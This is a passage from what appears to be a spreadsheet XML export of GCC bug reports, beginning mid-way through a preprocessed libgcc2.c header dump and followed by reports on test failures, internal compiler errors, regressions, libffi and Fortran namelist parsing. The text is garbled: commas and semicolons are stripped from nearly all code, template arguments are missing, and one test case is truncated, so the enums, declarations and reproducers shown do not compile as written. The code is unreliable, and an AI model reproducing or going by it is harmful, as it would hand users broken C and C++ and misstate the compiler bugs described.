  CODE_FOR_xordi3 = 511
  CODE_FOR_negdi2 = 515
  CODE_FOR_one_cmpldi2 = 517
  CODE_FOR_addtf3 = 519
  CODE_FOR_subtf3 = 520
  CODE_FOR_multf3 = 521
  CODE_FOR_divtf3 = 522
  CODE_FOR_negtf2 = 523
  CODE_FOR_negdf2 = 526
  CODE_FOR_abstf2 = 528
  CODE_FOR_absdf2 = 531
  CODE_FOR_sqrttf2 = 533
  CODE_FOR_ashldi3 = 534
  CODE_FOR_ashrdi3 = 535
  CODE_FOR_lshrdi3 = 536
  CODE_FOR_tablejump = 537
  CODE_FOR_call = 538
  CODE_FOR_call_value = 539
  CODE_FOR_untyped_call = 540
  CODE_FOR_sibcall = 541
  CODE_FOR_sibcall_value = 542
  CODE_FOR_sibcall_epilogue = 543
  CODE_FOR_untyped_return = 544
  CODE_FOR_indirect_jump = 546
  CODE_FOR_nonlocal_goto = 547
  CODE_FOR_builtin_setjmp_setup = 548
  CODE_FOR_setjmp = 549
  CODE_FOR_setjmp_32 = 550
  CODE_FOR_setjmp_64 = 551
  CODE_FOR_prologue = 568
  CODE_FOR_exception_receiver = 569
  CODE_FOR_builtin_setjmp_receiver = 570
  CODE_FOR_conditional_trap = 571
  CODE_FOR_nothing = 572 }
# 5 tm.h 2
# 1 /croc/mrg/gcc/egcs/gcc/config/sparc/sp64-elf.h 1
# 28 /croc/mrg/gcc/egcs/gcc/config/sparc/sp64-elf.h
# 1 /croc/mrg/gcc/egcs/gcc/config/sparc/sol2.h 1
# 24 /croc/mrg/gcc/egcs/gcc/config/sparc/sol2.h
# 1 /croc/mrg/gcc/egcs/gcc/config/sparc/sysv4.h 1
# 22 /croc/mrg/gcc/egcs/gcc/config/sparc/sysv4.h
# 1 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h 1
# 82 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
enum cmodel {
  CM_32
  CM_MEDLOW
  CM_MEDMID
  CM_MEDANY
  CM_EMBMEDANY
}
extern const char *sparc_cmodel_string
extern enum cmodel sparc_cmodel
# 432 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern int target_flags
# 666 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
enum processor_type {
  PROCESSOR_V7
  PROCESSOR_CYPRESS
  PROCESSOR_V8
  PROCESSOR_SUPERSPARC
  PROCESSOR_SPARCLITE
  PROCESSOR_F930
  PROCESSOR_F934
  PROCESSOR_HYPERSPARC
  PROCESSOR_SPARCLITE86X
  PROCESSOR_SPARCLET
  PROCESSOR_TSC701
  PROCESSOR_V9
  PROCESSOR_ULTRASPARC
}
extern enum processor_type sparc_cpu
# 721 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
struct sparc_cpu_select
{
  const char *string
  const char *name
  int set_tune_p
  int set_arch_p
}
extern struct sparc_cpu_select sparc_select[]
# 1168 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern int *hard_regno_mode_classes
extern int sparc_mode_class[]
# 1348 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
enum reg_class { NO_REGS FPCC_REGS I64_REGS GENERAL_REGS FP_REGS
                 EXTRA_FP_REGS GENERAL_OR_FP_REGS GENERAL_OR_EXTRA_FP_REGS
                 ALL_REGS LIM_REG_CLASSES }
# 1375 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern enum reg_class sparc_regno_reg_class[]
# 1425 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern char sparc_leaf_regs[]
extern char leaf_reg_remap[]
# 1777 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
struct sparc_args {
  int words
  int prototype_p
  int libcall_p
}
# 1866 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern struct rtx_def *sparc_compare_op0 *sparc_compare_op1
# 1902 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern char sparc_hard_reg_printed[8]
# 3409 /croc/mrg/gcc/egcs/gcc/config/sparc/sparc.h
extern int flag_pic
# 23 /croc/mrg/gcc/egcs/gcc/config/sparc/sysv4.h 2
# 34 /croc/mrg/gcc/egcs/gcc/config/sparc/sysv4.h
# 1 /croc/mrg/gcc/egcs/gcc/config/svr4.h 1
# 46 /croc/mrg/gcc/egcs/gcc/config/svr4.h
# 1 /croc/mrg/gcc/egcs/gcc/config/elfos.h 1
# 78 /croc/mrg/gcc/egcs/gcc/config/elfos.h
# 1 /croc/mrg/gcc/egcs/gcc/config/dbxelf.h 1
# 79 /croc/mrg/gcc/egcs/gcc/config/elfos.h 2
# 47 /croc/mrg/gcc/egcs/gcc/config/svr4.h 2
# 35 /croc/mrg/gcc/egcs/gcc/config/sparc/sysv4.h 2
# 25 /croc/mrg/gcc/egcs/gcc/config/sparc/sol2.h 2
# 29 /croc/mrg/gcc/egcs/gcc/config/sparc/sp64-elf.h 2
# 11 tm.h 2
# 41 /croc/mrg/gcc/egcs/gcc/config/sparc/xm-sparc.h 2
# 7 tconfig.h 2
# 37 /croc/mrg/gcc/egcs/gcc/libgcc2.c 2
# 1 /croc/mrg/gcc/egcs/gcc/tsystem.h 1
# 26 /croc/mrg/gcc/egcs/gcc/tsystem.h
# 1 /orb/j/mrg/build/sparc64-elf/gcc/include/stddef.h 1 3
# 147 /orb/j/mrg/build/sparc64-elf/gcc/include/stddef.h 3
typedef long int ptrdiff_t
# 199 /orb/j/mrg/build/sparc64-elf/gcc/include/stddef.h 3
typedef long unsigned int size_t
# 287 /orb/j/mrg/build/sparc64-elf/gcc/include/stddef.h 3
typedef short unsigned int wchar_t
# 27 /croc/mrg/gcc/egcs/gcc/tsystem.h 2
extern void *malloc (size_t)
extern void free (void *)
extern int atexit (void (*)(void))
# 38 /croc/mrg/gcc/egcs/gcc/libgcc2.c 2
# 1 /croc/mrg/gcc/egcs/gcc/machmode.h 1
# 29 /croc/mrg/gcc/egcs/gcc/machmode.h
enum machine_mode {
# 1 /croc/mrg/gcc/egcs/gcc/machmode.def 1
# 67 /croc/mrg/gcc/egcs/gcc/machmode.def
VOIDmode
BImode
QImode
HImode
SImode
DImode
TImode
OImode
PQImode
PHImode
PSImode
PDImode
QFmode
HFmode
TQFmode
SFmode
DFmode
XFmode
TFmode
QCmode
HCmode
SCmode
DCmode
XCmode
TCmode
CQImode
CHImode
CSImode
CDImode
CTImode
COImode
V2QImode
V2HImode
V2SImode
V2DImode
V4QImode
V4HImode
V4SImode
V4DImode
V8QImode
V8HImode
V8SImode
V8DImode
V16QImode
V2SFmode
V2DFmode
V4SFmode
V4DFmode
V8SFmode
V8DFmode
BLKmode
# 148 /croc/mrg/gcc/egcs/gcc/machmode.def
CCmode
CCXmode CC_NOOVmode CCX_NOOVmode CCFPmode CCFPEmode
# 31 /croc/mrg/gcc/egcs/gcc/machmode.h 2
MAX_MACHINE_MODE }
# 41 /croc/mrg/gcc/egcs/gcc/machmode.h
extern const char * const mode_name[]
enum mode_class { MODE_RANDOM MODE_INT MODE_FLOAT MODE_PARTIAL_INT MODE_CC
                  MODE_COMPLEX_INT MODE_COMPLEX_FLOAT
                  MODE_VECTOR_INT MODE_VECTOR_FLOAT
                  MAX_MODE_CLASS}
extern const enum mode_class mode_class[]
# 80 /croc/mrg/gcc/egcs/gcc/machmode.h
extern const unsigned int mode_size[]
extern const unsigned int mode_unit_size[]
# 96 /croc/mrg/gcc/egcs/gcc/machmode.h
extern const unsigned int mode_bitsize[]
# 112 /croc/mrg/gcc/egcs/gcc/machmode.h
extern const unsigned char mode_wider_mode[]
extern enum machine_mode mode_for_size (unsigned int enum mode_class int)
extern enum machine_mode smallest_mode_for_size
                                (unsigned int enum mode_class)
extern enum machine_mode int_mode_for_mode (enum machine_mode)
extern enum machine_mode get_best_mode (int int unsigned int enum machine_mode int)
extern unsigned get_mode_alignment (enum machine_mode)
extern const enum machine_mode class_narrowest_mode[]
extern enum machine_mode byte_mode
extern enum machine_mode word_mode
extern enum machine_mode ptr_mode
# 40 /croc/mrg/gcc/egcs/gcc/libgcc2.c 2
# 1 /croc/mrg/gcc/egcs/gcc/defaults.h 1
# 41 /croc/mrg/gcc/egcs/gcc/libgcc2.c 2
# 1 /croc/mrg/gcc/egcs/gcc/libgcc2.h 1
# 25 /croc/mrg/gcc/egcs/gcc/libgcc2.h
extern int __gcc_bcmp (const unsigned char * const unsigned char * size_t)
extern void *__builtin_saveregs (void)
extern void __dummy (void)
extern void __clear_cache (char * char *)
extern void __pure_virtual (void) __attribute__ ((__noreturn__))
extern void __terminate (void) __attribute__ ((__noreturn__))
extern void __default_terminate (void) __attribute__ ((__noreturn__))
extern void *__throw_type_match (void * void * void *)
extern void __empty (void)
extern void *__get_eh_context (void)
extern void **__get_eh_info (void)
extern void ***__get_dynamic_handler_chain (void)
extern int __eh_rtime_match (void *)
extern void __unwinding_cleanup (void)
extern void __rethrow (void *)
extern void __throw (void)
extern void __sjthrow (void) __attribute__ ((__noreturn__))
extern void __sjpopnthrow (void) __attribute__ ((__noreturn__))
extern void __eprintf (const char * const char * unsigned int const char *)
  __attribute__ ((__noreturn__))
extern void *__eh_alloc (size_t)
extern void __eh_free (void *)
struct bb
extern void __bb_exit_func (void)
extern void __bb_init_func (struct bb *)
extern void __bb_fork_func (void)
extern void __bb_trace_func (void)
extern void __bb_trace_ret (void)
extern void __bb_init_trace_func (struct bb * unsigned long)
struct exception_descriptor
extern short int __get_eh_table_language (struct exception_descriptor *)
extern short int __get_eh_table_version (struct exception_descriptor *)
# 85 /croc/mrg/gcc/egcs/gcc/libgcc2.h
typedef int QItype __attribute__ ((mode (QI)))
typedef unsigned int UQItype __attribute__ ((mode (QI)))
typedef int HItype __attribute__ ((mode (HI)))
typedef unsigned int UHItype __attribute__ ((mode (HI)))
typedef int SItype __attribute__ ((mode (SI)))
typedef unsigned int USItype __attribute__ ((mode (SI)))
typedef int DItype __attribute__ ((mode (DI)))
typedef unsigned int UDItype __attribute__ ((mode (DI)))
typedef int TItype __attribute__ ((mode (TI)))
typedef unsigned int UTItype __attribute__ ((mode (TI)))
typedef float SFtype __attribute__ ((mode (SF)))
typedef float DFtype __attribute__ ((mode (DF)))
typedef float TFtype __attribute__ ((mode (TF)))
# 140 /croc/mrg/gcc/egcs/gcc/libgcc2.h
typedef int word_type __attribute__ ((mode (__word__)))
# 228 /croc/mrg/gcc/egcs/gcc/libgcc2.h
extern TItype __multi3 (TItype TItype)
extern TItype __divti3 (TItype TItype)
extern UTItype __udivti3 (UTItype UTItype)
extern UTItype __umodti3 (UTItype UTItype)
extern TItype __modti3 (TItype TItype)
extern UTItype __udivmodti4 (UTItype UTItype UTItype *)
extern TItype __negti2 (TItype)
extern TItype __lshrti3 (TItype word_type)
extern TItype __ashlti3 (TItype word_type)
extern TItype __ashrti3 (TItype word_type)
extern TItype __ffsti2 (TItype)
extern UDItype __udiv_w_sdiv (UDItype * UDItype UDItype UDItype)
extern word_type __cmpti2 (TItype TItype)
extern word_type __ucmpti2 (TItype TItype)
extern SItype __absvsi2 (SItype)
extern DItype __absvdi2 (DItype)
extern SItype __addvsi3 (SItype SItype)
extern DItype __addvdi3 (DItype DItype)
extern SItype __subvsi3 (SItype SItype)
extern DItype __subvdi3 (DItype DItype)
extern SItype __mulvsi3 (SItype SItype)
extern DItype __mulvdi3 (DItype DItype)
extern SItype __negvsi2 (SItype)
extern DItype __negvdi2 (DItype)
extern TItype __fixdfti (DFtype)
extern TItype __fixsfti (SFtype)
extern DFtype __floattidf (TItype)
extern SFtype __floattisf (TItype)
extern UDItype __fixunsdfdi (DFtype)
extern UDItype __fixunssfdi (SFtype)
extern TItype __fixunsdfti (DFtype)
extern TItype __fixunssfti (SFtype)
# 288 /croc/mrg/gcc/egcs/gcc/libgcc2.h
extern TItype __fixunstfti (TFtype)
extern TItype __fixtfti (TFtype)
extern TFtype __floattitf (TItype)
  struct DWstruct {DItype high low}
# 307 /croc/mrg/gcc/egcs/gcc/libgcc2.h
typedef union
{
  struct DWstruct s
  TItype ll
} DWunion
# 1 /croc/mrg/gcc/egcs/gcc/longlong.h 1
# 1450 /croc/mrg/gcc/egcs/gcc/longlong.h
extern const UQItype __clz_tab[]
# 314 /croc/mrg/gcc/egcs/gcc/libgcc2.h 2
# 48 /croc/mrg/gcc/egcs/gcc/libgcc2.c 2
# 924 /croc/mrg/gcc/egcs/gcc/libgcc2.c
TItype
__fixunsdfti (DFtype a)
{
  DFtype b
  UTItype v
  if (a &lt; 0)
    return 0
  b = (a / (((UTItype) 1) &lt;&lt; (sizeof (DItype) * 8)))
  v = (UDItype) b
  v &lt;&lt;= (sizeof (DItype) * 8)
  a -= (DFtype)v
  if (a &lt; 0)
    v -= (UDItype) (- a)
  else
    v += (UDItype) a
  return v
}</t>
  </si>
  <si>
    <t>GCC-18336</t>
  </si>
  <si>
    <t>mmix-knuth-mmixware testsuite failure: gcc.dg/20040813-1.c</t>
  </si>
  <si>
    <t>The testcase is just buggy it assumes the target supports stabs
but should not do so.  It should use some dg-require-stabs function
alt. xfail all non-stabs targets (like this one dwarf2 only)
alt. compile on just a known set of stabs targets.
For the record the .log message is:
/gcc/testsuite/gcc.dg/20040813-1.c:1: error: target system does not support the
stabs debug format</t>
  </si>
  <si>
    <t>GCC-64901</t>
  </si>
  <si>
    <t>[4.9/5 Regression] overriding final function defined out of line does not lead to an error</t>
  </si>
  <si>
    <t>It was reported by talin over at ##C++ that the following snippet does not result in a compilation error as expected:
    struct Plant {
      virtual void speak() final
    }
    void Plant::speak(){}
    struct Flower :  Plant {
      void speak(){}
    }
    int main() {}
The issue can be reproduced with gcc-4.9.0 and upwards and it only happens when `Plant::speak` is defined out-of-line.</t>
  </si>
  <si>
    <t>kaballo86</t>
  </si>
  <si>
    <t>GCC-37428</t>
  </si>
  <si>
    <t>GNU VLA-in-structure extension is undocumented</t>
  </si>
  <si>
    <t>This is a GNU extension to C99:
void foo(int n)
{
  struct S { int x[n] }
}
It is not mentioned in the C Extensions section of the manual.</t>
  </si>
  <si>
    <t>GCC-54031</t>
  </si>
  <si>
    <t>[4.8 Regression] Revision 189607 miscompiles Linux kernel</t>
  </si>
  <si>
    <t>Starting with revision 189607 the Linux kernel (latest git) just hangs early during boot:
...
Kernel command line: root=PARTUUID=1E3384D0-CAE6-41BB-8CD6-4F640164EFD7 init=/sbin/minit rootflags=logbsize=256k drm_kms_helper.poll=0
PID hash table entries: 4096 (order: 3 32768 bytes)
Dentry cache hash table entries: 1048576 (order: 11 8388608 bytes)
Inode-cache hash table entries: 524288 (order: 10 4194304 bytes)
__ex_table already sorted skipping sort
Memory: 8167084k/8912896k available (4984k kernel code 526212k absent 219600k reserved 3597k data 440k init)
SLUB: Genslabs=15 HWalign=64 Order=0-3 MinObjects=0 CPUs=4 Nodes=1
Hierarchical RCU implementation.
NR_IRQS:4352 nr_irqs:712 16
Extended CMOS year: 2000
Console: colour VGA+ 80x25
console [tty0] enabled
(hang)
3482bf1319f9e65a4783bbe9d5b59c11312888db is the first bad commit
commit 3482bf1319f9e65a4783bbe9d5b59c11312888db
Author: rguenth 
Date:   Wed Jul 18 08:49:55 2012 +0000
    2012-07-18  Richard Guenther  
        * tree.h (get_object_or_type_alignment): Remove.
        * builtins.c (get_object_alignment_2): New function copied from
        get_object_alignment_1.  Take extra argument to indicate whether
        we take the address of EXP.  Rework to use type alignment information
        if not and return whether the result is an approximation or not.
        (get_object_alignment_1): Wrap around get_object_alignment_2.
        (get_pointer_alignment_1): Call get_object_alignment_2 indicating
        we take the address.
        (get_object_or_type_alignment): Remove.
        * expr.c (expand_assignment): Call get_object_alignment.
        (expand_expr_real_1): Likewise.</t>
  </si>
  <si>
    <t>GCC-19657</t>
  </si>
  <si>
    <t>Namelist reading may be skipped if end with a logical variable</t>
  </si>
  <si>
    <t>If a namelist which contains a logical variable followed by the same one in a input file
sometimes the second namelist is skipped to read.  Maybe the example following shows you
clearer.
      implicit none
      logical   l
      integer   i
      namelist /nm/ i l
 100  continue 
      read(*nmend=190)
      write (*nm)
      goto 100
 190  continue 
      stop
      end
This is an input file example.
 &amp;nm i=1l=t &amp;end
 &amp;nm i=2 &amp;end
 &amp;nm i=3 &amp;end
Ant the output is like this:
% ./a.out &lt; inputfile
&amp;NM 
 I = 1 
 L = T/
&amp;NM 
 I = 3 
 L = T/
#
The second one is skipped.
I found two method to avoid this feature.
One way is that put the logical variable at the position except for the very end:
 &amp;nm l=ti=1 &amp;end
or
 &amp;nm i=1l=t&amp;end
The comma after `t' helps to avoid skipping the next one.
The other way is that use `/' instead of &amp;end (maybe this is standard way).
I think there is something wrong with syntax analysis for the logical constant.
My environment is like this.
% g77 -v
Reading specs from /usr/lib/gcc/i486-linux/3.4.4/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --libexecdir=/usr/lib --with-gxx-include-dir=/usr/include/c++/3.4 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --program-suffix=-3.4 --enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk --disable-werror i486-linux
Thread model: posix
gcc version 3.4.4 20041218 (prerelease) (Debian 3.4.3-6)
I have tried this program with other versions.  g77 3.3 has the same problem.
g77 2.95 does not.</t>
  </si>
  <si>
    <t>fuyuki</t>
  </si>
  <si>
    <t>GCC-20933</t>
  </si>
  <si>
    <t>[4.1 Regression] gcc can no longer bootstrap itself</t>
  </si>
  <si>
    <t>I just had a bootstrap failure on i686-pc-linux-gnu with
CVS mainline of a few minutes ago.
I ran (in an empty directory):
$ ../gcc-4.1/configure --prefix=$HOME --enable-languages=cf95
$ make bootstrap
...
m -f include/limits.h
cp xlimits.h include/limits.h
chmod a+r include/limits.h
rm -f include/README
cp ../../gcc-4.1/gcc/../fixincludes/README-fixinc include/README
chmod a+r include/README
echo timestamp &gt; stmp-int-hdrs
objext='.o' \
LIB1ASMFUNCS='' \
LIB2FUNCS_ST='_eprintf __gcc_bcmp' \
LIBGCOV='_gcov _gcov_merge_add _gcov_merge_single _gcov_merge_delta _gcov_fork
_gcov_execl _gcov_execlp _gcov_execle _gcov_execv _gcov_execvp _gcov_execve' \
LIB2ADD='' \
LIB2ADD_ST='' \
LIB2ADDEH='../../gcc-4.1/gcc/unwind-dw2.c
../../gcc-4.1/gcc/unwind-dw2-fde-glibc.c ../../gcc-4.1/gcc/unwind-sjlj.c
../../gcc-4.1/gcc/gthr-gnat.c ../../gcc-4.1/gcc/unwind-c.c' \
LIB2ADDEHSTATIC='../../gcc-4.1/gcc/unwind-dw2.c
../../gcc-4.1/gcc/unwind-dw2-fde-glibc.c ../../gcc-4.1/gcc/unwind-sjlj.c
../../gcc-4.1/gcc/gthr-gnat.c ../../gcc-4.1/gcc/unwind-c.c' \
LIB2ADDEHSHARED='../../gcc-4.1/gcc/unwind-dw2.c
../../gcc-4.1/gcc/unwind-dw2-fde-glibc.c ../../gcc-4.1/gcc/unwind-sjlj.c
../../gcc-4.1/gcc/gthr-gnat.c ../../gcc-4.1/gcc/unwind-c.c' \
LIB2ADDEHDEP='unwind.inc unwind-dw2-fde.h unwind-dw2-fde.c' \
LIBUNWIND='' \
LIBUNWINDDEP='' \
SHLIBUNWIND_LINK='' \
SHLIBUNWIND_INSTALL='' \
FPBIT='' \
FPBIT_FUNCS='_pack_sf _unpack_sf _addsub_sf _mul_sf _div_sf _fpcmp_parts_sf
_compare_sf _eq_sf _ne_sf _gt_sf _ge_sf _lt_sf _le_sf _unord_sf _si_to_sf
_sf_to_si_negate_sf _make_sf _sf_to_df _sf_to_tf _thenan_sf _sf_to_usi _usi_to_sf' \
LIB2_DIVMOD_FUNCS='_divdi3 _moddi3 _udivdi3 _umoddi3 _udiv_w_sdiv _udivmoddi4' \
DPBIT='' \
DPBIT_FUNCS='_pack_df _unpack_df _addsub_df _mul_df _div_df _fpcmp_parts_df
_compare_df _eq_df _ne_df _gt_df _ge_df _lt_df _le_df _unord_df _si_to_df
_df_to_si_negate_df _make_df _df_to_sf _df_to_tf _thenan_df _df_to_usi _usi_to_df' \
TPBIT='' \
TPBIT_FUNCS='_pack_tf _unpack_tf _addsub_tf _mul_tf _div_tf _fpcmp_parts_tf
_compare_tf _eq_tf _ne_tf _gt_tf _ge_tf _lt_tf _le_tf _unord_tf _si_to_tf
_tf_to_si_negate_tf _make_tf _tf_to_df _tf_to_sf _thenan_tf _tf_to_usi _usi_to_tf' \
MULTILIBS=` ./xgcc -B./ -B/home/ig25/i686-pc-linux-gnu/bin/ -isystem
/home/ig25/i686-pc-linux-gnu/include -isystem
/home/ig25/i686-pc-linux-gnu/sys-include -L/home/ig25/gcc-4.1-bin/gcc/../ld
--print-multi-lib` \
EXTRA_MULTILIB_PARTS='' \
SHLIB_LINK=' ./xgcc -B./ -B/home/ig25/i686-pc-linux-gnu/bin/ -isystem
/home/ig25/i686-pc-linux-gnu/include -isystem
/home/ig25/i686-pc-linux-gnu/sys-include -L/home/ig25/gcc-4.1-bin/gcc/../ld -O2
 -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-Wold-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT
-DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -shared -nodefaultlibs
-Wl--soname=@shlib_base_name@.so.1 -Wl--version-script=@shlib_map_file@ -o
@multilib_dir@/@shlib_base_name@.so.1.tmp @multilib_flags@ @shlib_objs@ -lc &amp;&amp;
rm -f @multilib_dir@/@shlib_base_name@.so &amp;&amp; if [ -f
@multilib_dir@/@shlib_base_name@.so.1 ] then mv -f
@multilib_dir@/@shlib_base_name@.so.1
@multilib_dir@/@shlib_base_name@.so.1.backup else true fi &amp;&amp; mv
@multilib_dir@/@shlib_base_name@.so.1.tmp @multilib_dir@/@shlib_base_name@.so.1
&amp;&amp; ln -s @shlib_base_name@.so.1 @multilib_dir@/@shlib_base_name@.so' \
SHLIB_INSTALL='$(mkinstalldirs) $(DESTDIR)$(slibdir)@shlib_slibdir_qual@
/usr/bin/install -c -m 644 @multilib_dir@/@shlib_base_name@.so.1
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@/@shlib_base_name@.so.1 rm -f
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@/@shlib_base_name@.so ln -s
@shlib_base_name@.so.1
$(DESTDIR)$(slibdir)@shlib_slibdir_qual@/@shlib_base_name@.so' \
SHLIB_EXT='.so' \
SHLIB_MULTILIB='' \
SHLIB_MKMAP='../../gcc-4.1/gcc/mkmap-symver.awk' \
SHLIB_MKMAP_OPTS='' \
SHLIB_MAPFILES='../../gcc-4.1/gcc/libgcc-std.ver
../../gcc-4.1/gcc/config/libgcc-glibc.ver' \
SHLIB_NM_FLAGS='-pg' \
MULTILIB_OSDIRNAMES='' \
ASM_HIDDEN_OP='' \
mkinstalldirs='/bin/sh ../../gcc-4.1/gcc/../mkinstalldirs' \
  /bin/sh mklibgcc &gt; tmp-libgcc.mk
mv tmp-libgcc.mk libgcc.mk
TARGET_CPU_DEFAULT= \
HEADERS=ansidecl.h DEFINES= \
/bin/sh ../../gcc-4.1/gcc/mkconfig.sh tconfig.h
./xgcc -B./ -B/home/ig25/i686-pc-linux-gnu/bin/ -isystem
/home/ig25/i686-pc-linux-gnu/include -isystem
/home/ig25/i686-pc-linux-gnu/sys-include -L/home/ig25/gcc-4.1-bin/gcc/../ld -O2
-DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes-Wmissing-prototypes
-Wold-style-definition  -isystem ./include  -I. -I. -I../../gcc-4.1/gcc
-I../../gcc-4.1/gcc/. -I../../gcc-4.1/gcc/../include
-I../../gcc-4.1/gcc/../libcpp/include   -g0 -finhibit-size-directive
-fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss
-fno-unit-at-a-time -fno-omit-frame-pointer \
   -c ../../gcc-4.1/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
make[2]: *** [crtbegin.o] Aborted
make[2]: Leaving directory `/home/ig25/gcc-4.1-bin/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/home/ig25/gcc-4.1-bin/gcc'
make: *** [bootstrap] Error 2
The compiler used for bootstrapping was
$ gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1/configure --prefix=/home/ig25 --enable-languages=cf95
Thread model: posix
gcc version 4.1.0 20050409 (experimental)
I then repeated the bootstrap with gcc version 3.3.5 (Debian 1:3.3.5-12)
the problem didn't occur (bootstrap is running fine in stage3 at
the moment).</t>
  </si>
  <si>
    <t>GCC-36598</t>
  </si>
  <si>
    <t>Failed optimisation of return of struct argment in memcpy-1.c</t>
  </si>
  <si>
    <t>Testcase gcc.dg/memcpy-1.c fails on AVR target.
Failure occurs because the return value is not simplified to avoid memcpy. This test works on i686 and I can't see why same optimization should not apply to AVR
Test is:
/* { dg-do compile } */
/* { dg-options -O2 -fdump-tree-optimized } */
/* { dg-final { scan-tree-dump-times nasty_local 0 optimized } } */
/* { dg-final { cleanup-tree-dump optimized } } */
struct a {int abc} a
int test(struct a a)
{
struct a nasty_local
__builtin_memcpy (
return nasty_local.a
}
On i686 we get:
 Function test (test)
Analyzing Edge Insertions.
test (struct a a)
{
:
  return a.a
}
BUT on AVR we get:
 Function test (test)
Analyzing Edge Insertions.
test (struct a a)
{
  struct a nasty_local
:
  nasty_local = a
  return nasty_local.a
}
I have confirmed the final AVR code is suboptimal.</t>
  </si>
  <si>
    <t>GCC-21229</t>
  </si>
  <si>
    <t>LibFFI can't handle Longs</t>
  </si>
  <si>
    <t>I've had troubles in the FFI module I'm building when dealing with (unsigned) 
longs what happens is that the second unsigned long argument never reached 
the function I'm calling with ffi_call. 
I've built a small test (attached) to show this particular problem (in the 
hope that the problem would disappear but that didn't happen). I've checked 
and re-checked how I pass the arguments to ffi_call I couldn't find anything 
wrong (debugging libffi internals is not easy :( ).</t>
  </si>
  <si>
    <t>pupeno</t>
  </si>
  <si>
    <t>GCC-33453</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in build2_stat at tree.c:3110 with -ftree-parallelize-loops=4 -ftree-vectorize</t>
  </si>
  <si>
    <t>Following (delta reduced) testcase ICEs with 'gcc -O2 -msse2 -ftree-parallelize-loops=4 -ftree-vectorize' on i686 and x86_64:
gcc -O2 -msse2 -ftree-parallelize-loops=4 -ftree-vectorize 048.c
048.c: In function 'Create_BCyl':
048.c:15: internal compiler error: in build2_stat at tree.c:3110
Please submit a full bug report
--cut here--
typedef struct BCyl_Struct BCYL
typedef struct BCyl_Entry_Struct BCYL_ENTRY
struct BCyl_Entry_Struct
{
  short r1 r2
  short h1 h2
}
struct BCyl_Struct
{
  int number
  BCYL_ENTRY *entry
}
Create_BCyl (int number double *tmp_r1 double *tmp_r2 double *tmp_h1
             double *tmp_h2)
{
  int i j nr nh
  int *tmp_r1_index
  int *tmp_r2_index
  int *tmp_h1_index
  int *tmp_h2_index
  BCYL *bcyl
  for (i = 0 i number i++)
    {
      bcyl-&gt;entry[i].r1 = tmp_r1_index[i]
      bcyl-&gt;entry[i].r2 = tmp_r2_index[i]
      bcyl-&gt;entry[i].h1 = tmp_h1_index[i]
      bcyl-&gt;entry[i].h2 = tmp_h2_index[i]
    }
}
--cut here--</t>
  </si>
  <si>
    <t>GCC-6523</t>
  </si>
  <si>
    <t>bug with pointers to template functions</t>
  </si>
  <si>
    <t>Note that I built g++ 3.0.4 on my home linux system (Mandrake 8.1) 
and got same compiler failure so it is unlikely to be related to environment. 
Output from g++ is following:
     funcPtrProblem.cc: In function `int main()':
     funcPtrProblem.cc:32: Internal compiler error in 
         c_expand_expr at c-common.c: 4121
A class Tester defines a function pointer typedef BarFunc and an example static function 
template of that type called bar(). Two different class templates Foo1 and Foo2 
each have a /templated/ constructor (ie Foo1::Foo1) that use a pointer to the 
bar() template function.  One Foo accesses this bar via inheritence i.e. Foo2 inherits 
from Tester.  The other Foo1 accesses it directly since it is static and public.  In other words 
both Foo classes do exactly the same thing (semantically) but in different ways.  Foo2 causes 
compiler crash. Compilation works if constructor of Foo2 is not templated or even if it is but 
Foo2 itself is not a class template or if bar is not a template.
Release:
3.0.1
Environment:
System: IRIX64 onyx1 6.5 07091542 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: ../configure --prefix=/usr/freeware --enable-version-specific-runtime-libs --disable-shared --enable-threads --enable-haifa
How-To-Repeat:
Put following code in one file called funcPtrProblem.cc and do 
g++ -c funcPtrProblem.cc
to get the above internal compiler error
struct Tester
{
    typedef void (*BarFunc)()
    template 
    static void bar() {}
}
template 
struct Foo1
{
    template 
    Foo1(T2* Tester::BarFunc = &amp;Tester::bar) {}
}
template 
struct Foo2: private Tester
{
    template 
    Foo2(T2* BarFunc = &amp;bar) {}
}
int main()
{
     Foo1 foo1(new int)
     Foo2 foo2(new int)
}</t>
  </si>
  <si>
    <t>oliver.schoenborn</t>
  </si>
  <si>
    <t>GCC-70503</t>
  </si>
  <si>
    <t>[4.9/5 Regression] extern C functions in src/c++11/thread.cc are global in libstdc++.a</t>
  </si>
  <si>
    <t>In src/c++11/thread.cc we have:
namespace std
{
  namespace
  {
    extern C void*
    execute_native_thread_routine(void*)
    {
      // ...
    }
#if _GLIBCXX_THREAD_ABI_COMPAT
    extern C void*
    execute_native_thread_routine_compat(void* __p)
    {
      // ...
    }
#endif
  }
  // ...
I was under the mistaken impression that the unnamed namespace meant those functions got internal linkage but as PR 70476 points out that's not true.
This means the functions are global symbols in the static library (they're not exported from the shared library because the linker script makes everything internal by default and only selected symbols are exported).
